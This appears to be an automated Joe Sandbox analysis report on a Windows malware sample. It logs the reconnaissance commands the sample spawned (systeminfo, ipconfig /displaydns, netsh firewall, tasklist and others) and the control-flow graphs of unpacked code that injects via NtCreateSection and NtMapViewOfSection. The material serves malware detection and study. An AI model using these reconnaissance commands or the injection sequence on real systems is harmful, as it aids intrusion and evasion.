                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:36
                                                                      Start time:06:30:08
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                                                                      Imagebase:0x7ff7c1820000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:37
                                                                      Start time:06:30:13
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\ipconfig.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:ipconfig /displaydns
                                                                      Imagebase:0x7ff7759e0000
                                                                      File size:35'840 bytes
                                                                      MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:38
                                                                      Start time:06:30:14
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\ROUTE.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:route print
                                                                      Imagebase:0x7ff7dc2e0000
                                                                      File size:24'576 bytes
                                                                      MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:39
                                                                      Start time:06:30:15
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\netsh.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:netsh firewall show state
                                                                      Imagebase:0x7ff7173e0000
                                                                      File size:96'768 bytes
                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:40
                                                                      Start time:06:30:17
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\systeminfo.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:systeminfo
                                                                      Imagebase:0x7ff6087c0000
                                                                      File size:110'080 bytes
                                                                      MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:42
                                                                      Start time:06:30:26
                                                                      Start date:03/10/2024
                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:tasklist /v /fo csv
                                                                      Imagebase:0x7ff64b7b0000
                                                                      File size:106'496 bytes
                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:8.5%
                                                                        Dynamic/Decrypted Code Coverage:40.7%
                                                                        Signature Coverage:44.9%
                                                                        Total number of Nodes:118
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph 3284 402e40 3286 402e37 3284->3286 3287 402edf 3286->3287 3288 4018e6 3286->3288 3289 4018f5 3288->3289 3290 40192e Sleep 3289->3290 3291 401949 3290->3291 3293 40195a 3291->3293 3294 401514 3291->3294 3293->3287 3295 401524 3294->3295 3296 4015c4 NtDuplicateObject 3295->3296 3305 4016e0 3295->3305 3297 4015e1 NtCreateSection 3296->3297 3296->3305 3298 401661 NtCreateSection 3297->3298 3299 401607 NtMapViewOfSection 3297->3299 3301 40168d 3298->3301 3298->3305 3299->3298 3300 40162a NtMapViewOfSection 3299->3300 3300->3298 3302 401648 3300->3302 3303 401697 NtMapViewOfSection 3301->3303 3301->3305 3302->3298 3304 4016be NtMapViewOfSection 3303->3304 3303->3305 3304->3305 3305->3293 3401 401542 3402 40153b 3401->3402 3403 4015c4 NtDuplicateObject 3402->3403 3412 4016e0 3402->3412 3404 4015e1 NtCreateSection 3403->3404 3403->3412 3405 401661 NtCreateSection 3404->3405 3406 401607 NtMapViewOfSection 3404->3406 3408 40168d 3405->3408 3405->3412 3406->3405 3407 40162a NtMapViewOfSection 3406->3407 3407->3405 3409 401648 3407->3409 3410 401697 NtMapViewOfSection 3408->3410 3408->3412 3409->3405 3411 4016be NtMapViewOfSection 3410->3411 3410->3412 3411->3412 3321 25b003c 3322 25b0049 3321->3322 3334 25b0e0f SetErrorMode SetErrorMode 3322->3334 3327 25b0265 3328 25b02ce VirtualProtect 3327->3328 3330 25b030b 3328->3330 3329 25b0439 VirtualFree 3333 25b04be LoadLibraryA 3329->3333 3330->3329 3332 25b08c7 3333->3332 3335 25b0223 3334->3335 3336 25b0d90 3335->3336 3337 25b0dad 3336->3337 3338 25b0dbb GetPEB 3337->3338 3339 25b0238 VirtualAlloc 3337->3339 3338->3339 3339->3327 3460 402dd0 3461 402ddc 3460->3461 3462 4018e6 8 API calls 3461->3462 3463 402edf 3461->3463 3462->3463 3382 4018f1 3383 4018f6 3382->3383 3384 40192e Sleep 3383->3384 3385 401949 3384->3385 3386 401514 7 API calls 3385->3386 3387 40195a 3385->3387 3386->3387 3447 401915 3448 4018c6 3447->3448 3449 40191a 3447->3449 3450 40192e Sleep 3449->3450 3451 401949 3450->3451 3452 401514 7 API calls 3451->3452 3453 40195a 3451->3453 3452->3453 3306 277f661 3307 277f670 3306->3307 3310 277fe01 3307->3310 3315 277fe1c 3310->3315 3311 277fe25 CreateToolhelp32Snapshot 3312 277fe41 Module32First 3311->3312 3311->3315 3313 277f679 3312->3313 3314 277fe50 3312->3314 3317 277fac0 3314->3317 3315->3311 3315->3312 3318 277faeb 3317->3318 3319 277fafc VirtualAlloc 3318->3319 3320 277fb34 3318->3320 3319->3320 3320->3320 3340 402f97 3341 4030ee 3340->3341 3342 402fc1 3340->3342 3342->3341 3343 40307c RtlCreateUserThread NtTerminateProcess 3342->3343 3343->3341 3344 25b0001 3345 25b0005 3344->3345 3350 25b092b GetPEB 3345->3350 3347 25b0030 3352 25b003c 3347->3352 3351 25b0972 3350->3351 3351->3347 3353 25b0049 3352->3353 3354 25b0e0f 2 API calls 3353->3354 3355 25b0223 3354->3355 3356 25b0d90 GetPEB 3355->3356 3357 25b0238 VirtualAlloc 3356->3357 3358 25b0265 3357->3358 3359 25b02ce VirtualProtect 3358->3359 3361 25b030b 3359->3361 3360 25b0439 VirtualFree 3364 25b04be LoadLibraryA 3360->3364 3361->3360 3363 25b08c7 3364->3363 3437 402d7b 3438 402d38 3437->3438 3438->3437 3439 402dc7 3438->3439 3440 4018e6 8 API calls 3438->3440 3440->3439 3365 25b0005 3366 25b092b GetPEB 3365->3366 3367 25b0030 3366->3367 3368 25b003c 7 API calls 3367->3368 3369 25b0038 3368->3369 3388 4014fe 3389 401506 3388->3389 3390 401531 3388->3390 3391 4015c4 NtDuplicateObject 3390->3391 3400 4016e0 3390->3400 3392 4015e1 NtCreateSection 3391->3392 3391->3400 3393 401661 NtCreateSection 3392->3393 3394 401607 NtMapViewOfSection 3392->3394 3396 40168d 3393->3396 3393->3400 3394->3393 3395 40162a NtMapViewOfSection 3394->3395 3395->3393 3397 401648 3395->3397 3398 401697 NtMapViewOfSection 3396->3398 3396->3400 3397->3393 3399 4016be NtMapViewOfSection 3398->3399 3398->3400 3399->3400

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 104 4018a5-4018b7 100->104 105 401595-4015be 101->105 106 401896 101->106 111 4018c5 104->111 112 4018bc-4018e3 call 401193 104->112 105->106 115 4015c4-4015db NtDuplicateObject 105->115 106->104 111->112 115->106 116 4015e1-401605 NtCreateSection 115->116 118 401661-401687 NtCreateSection 116->118 119 401607-401628 NtMapViewOfSection 116->119 118->106 123 40168d-401691 118->123 119->118 121 40162a-401646 NtMapViewOfSection 119->121 121->118 124 401648-40165e 121->124 123->106 126 401697-4016b8 NtMapViewOfSection 123->126 124->118 126->106 128 4016be-4016da NtMapViewOfSection 126->128 128->106 130 4016e0 call 4016e5 128->130
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                        • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 151 4018a5-4018b7 147->151 152 401595-4015be 148->152 153 401896 148->153 158 4018c5 151->158 159 4018bc-4018e3 call 401193 151->159 152->153 162 4015c4-4015db NtDuplicateObject 152->162 153->151 158->159 162->153 163 4015e1-401605 NtCreateSection 162->163 165 401661-401687 NtCreateSection 163->165 166 401607-401628 NtMapViewOfSection 163->166 165->153 170 40168d-401691 165->170 166->165 168 40162a-401646 NtMapViewOfSection 166->168 168->165 171 401648-40165e 168->171 170->153 173 401697-4016b8 NtMapViewOfSection 170->173 171->165 173->153 175 4016be-4016da NtMapViewOfSection 173->175 175->153 177 4016e0 call 4016e5 175->177
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                        • String ID:
                                                                        • API String ID: 1652636561-0
                                                                        • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                        • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 195 4018a5-4018b7 191->195 196 401595-4015be 192->196 197 401896 192->197 202 4018c5 195->202 203 4018bc-4018e3 call 401193 195->203 196->197 206 4015c4-4015db NtDuplicateObject 196->206 197->195 202->203 206->197 207 4015e1-401605 NtCreateSection 206->207 209 401661-401687 NtCreateSection 207->209 210 401607-401628 NtMapViewOfSection 207->210 209->197 214 40168d-401691 209->214 210->209 212 40162a-401646 NtMapViewOfSection 210->212 212->209 215 401648-40165e 212->215 214->197 217 401697-4016b8 NtMapViewOfSection 214->217 215->209 217->197 219 4016be-4016da NtMapViewOfSection 217->219 219->197 221 4016e0 call 4016e5 219->221
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                        • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 234 4018a5-4018b7 230->234 235 401595-4015be 231->235 236 401896 231->236 241 4018c5 234->241 242 4018bc-4018e3 call 401193 234->242 235->236 245 4015c4-4015db NtDuplicateObject 235->245 236->234 241->242 245->236 246 4015e1-401605 NtCreateSection 245->246 248 401661-401687 NtCreateSection 246->248 249 401607-401628 NtMapViewOfSection 246->249 248->236 253 40168d-401691 248->253 249->248 251 40162a-401646 NtMapViewOfSection 249->251 251->248 254 401648-40165e 251->254 253->236 256 401697-4016b8 NtMapViewOfSection 253->256 254->248 256->236 258 4016be-4016da NtMapViewOfSection 256->258 258->236 260 4016e0 call 4016e5 258->260
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                        • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 274 4018a5-4018b7 270->274 275 401595-4015be 271->275 276 401896 271->276 281 4018c5 274->281 282 4018bc-4018e3 call 401193 274->282 275->276 285 4015c4-4015db NtDuplicateObject 275->285 276->274 281->282 285->276 286 4015e1-401605 NtCreateSection 285->286 288 401661-401687 NtCreateSection 286->288 289 401607-401628 NtMapViewOfSection 286->289 288->276 293 40168d-401691 288->293 289->288 291 40162a-401646 NtMapViewOfSection 289->291 291->288 294 401648-40165e 291->294 293->276 296 401697-4016b8 NtMapViewOfSection 293->296 294->288 296->276 298 4016be-4016da NtMapViewOfSection 296->298 298->276 300 4016e0 call 4016e5 298->300
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                        • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                        • String ID:
                                                                        • API String ID: 1921587553-0
                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 319 277fe01-277fe1a 320 277fe1c-277fe1e 319->320 321 277fe25-277fe31 CreateToolhelp32Snapshot 320->321 322 277fe20 320->322 323 277fe33-277fe39 321->323 324 277fe41-277fe4e Module32First 321->324 322->321 323->324 329 277fe3b-277fe3f 323->329 325 277fe57-277fe5f 324->325 326 277fe50-277fe51 call 277fac0 324->326 330 277fe56 326->330 329->320 329->324 330->325
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0277FE29
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0277FE49
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1737299923.000000000276D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0276D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_276d000_veEGy9FijY.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: 8afb95ebc9d1f8fedaad84b5f9c10160769ca9b0bb3aa8e48ab6aca32493bd7d
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: B6F096312007156BDB203BF9AD8DB7F76ECAF49624F10052DF646D18C1DBB4E8454A62

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 25b003c-25b0047 1 25b0049 0->1 2 25b004c-25b0263 call 25b0a3f call 25b0e0f call 25b0d90 VirtualAlloc 0->2 1->2 17 25b028b-25b0292 2->17 18 25b0265-25b0289 call 25b0a69 2->18 20 25b02a1-25b02b0 17->20 22 25b02ce-25b03c2 VirtualProtect call 25b0cce call 25b0ce7 18->22 20->22 23 25b02b2-25b02cc 20->23 29 25b03d1-25b03e0 22->29 23->20 30 25b0439-25b04b8 VirtualFree 29->30 31 25b03e2-25b0437 call 25b0ce7 29->31 33 25b04be-25b04cd 30->33 34 25b05f4-25b05fe 30->34 31->29 36 25b04d3-25b04dd 33->36 37 25b077f-25b0789 34->37 38 25b0604-25b060d 34->38 36->34 40 25b04e3-25b0505 36->40 41 25b078b-25b07a3 37->41 42 25b07a6-25b07b0 37->42 38->37 43 25b0613-25b0637 38->43 51 25b0517-25b0520 40->51 52 25b0507-25b0515 40->52 41->42 44 25b086e-25b08be LoadLibraryA 42->44 45 25b07b6-25b07cb 42->45 46 25b063e-25b0648 43->46 50 25b08c7-25b08f9 44->50 48 25b07d2-25b07d5 45->48 46->37 49 25b064e-25b065a 46->49 53 25b07d7-25b07e0 48->53 54 25b0824-25b0833 48->54 49->37 55 25b0660-25b066a 49->55 56 25b08fb-25b0901 50->56 57 25b0902-25b091d 50->57 58 25b0526-25b0547 51->58 52->58 59 25b07e2 53->59 60 25b07e4-25b0822 53->60 62 25b0839-25b083c 54->62 61 25b067a-25b0689 55->61 56->57 66 25b054d-25b0550 58->66 59->54 60->48 63 25b068f-25b06b2 61->63 64 25b0750-25b077a 61->64 62->44 65 25b083e-25b0847 62->65 67 25b06ef-25b06fc 63->67 68 25b06b4-25b06ed 63->68 64->46 69 25b084b-25b086c 65->69 70 25b0849 65->70 72 25b05e0-25b05ef 66->72 73 25b0556-25b056b 66->73 74 25b074b 67->74 75 25b06fe-25b0748 67->75 68->67 69->62 70->44 72->36 76 25b056f-25b057a 73->76 77 25b056d 73->77 74->61 75->74 78 25b059b-25b05bb 76->78 79 25b057c-25b0599 76->79 77->72 84 25b05bd-25b05db 78->84 79->84 84->66
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 025B024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_25b0000_veEGy9FijY.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: 4b78ccde5262370ef2ce6d89914bcf3178e9d6056a566947f6f95aa948e59ef1
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: 62526974A01229DFDB65CF68C984BADBBB1BF09314F1480D9E54DAB391DB30AA85CF14

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 332 25b0e0f-25b0e24 SetErrorMode * 2 333 25b0e2b-25b0e2c 332->333 334 25b0e26 332->334 334->333
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,025B0223,?,?), ref: 025B0E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,025B0223,?,?), ref: 025B0E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_25b0000_veEGy9FijY.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: 8f6d2e30e3af7fa99cae600574b5a2077abbbd3ebbb0e80a8fe1475a88e7ad37
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: 55D0123514512877D7012A94DC09BCE7F1CDF05B66F008011FB0DD9080C770954046E9

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
